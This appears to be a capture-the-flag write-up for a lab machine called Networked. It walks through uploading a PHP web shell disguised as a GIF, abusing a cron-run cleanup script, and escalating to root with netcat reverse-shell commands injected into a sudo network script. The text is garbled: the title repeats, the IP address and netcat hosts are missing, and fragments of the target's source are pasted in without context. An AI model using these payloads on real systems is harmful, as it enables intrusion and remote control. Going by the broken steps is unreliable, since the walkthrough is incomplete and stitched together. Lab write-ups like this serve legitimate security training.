Networked Writeup: Gobuster
Networked Writeup: Gobuster
Networked Writeup: Gobuster
I've got two open port and one closed port. Obviously we'll start our enumeration with HTTP service.
When we visit the IP in our browser we get a very simple web page with nothing fancy, just some text.
Now if we try to visit /upload.php on the website we get option to upload a file. I tried uploading
a phpbash shell but got error about the Invalid image file.
This is means we need to upload our shell in an image file so I made a file name shell.php.gif having
the following content.
<?php system($_GET['cmd']);?>
Then uploaded it. This file can be found on /uploads + it is your IP address (with '.' replaced by '_')
plus the extension.
So my interface IP is and the file I uploaded was shell.php.gif so my file will be found
on /uploads/10_10_14_225.php.gif.
Now we have the RCE, using that we can get a shell:
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
Then start the listener and wait because the check_attack.php is ran by a cronjob. After few minutes I
got the shell as user gully
Now I can get the user hash.
I ran sudo -l to see if this user have some sudo rights or not.
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
/sbin/ifup guly0
It asks for inputs like name, interface etc. The important thing is that it takes input. So we can try
something like ;nc -c /bin/sh 4444. But if we give that as input we'll get error saying wrong
input cause there is regex in the source i.e regexp="^[a-zA-Z0-9_\ /-]+$" so we cannot use anything
other then those chars.
To bypass this I made a file called shell with the following data in it:
$ echo "nc -e /bin/sh 4444" > shell
$ chmod +x shell
Then in place of NAME I ented bash /home/guly/shell and entered radnom things in other inputs and
BOOM 💥💥💥
This gives us a root reverse shell.
We are now successfully able to get the root access and the CTF flag.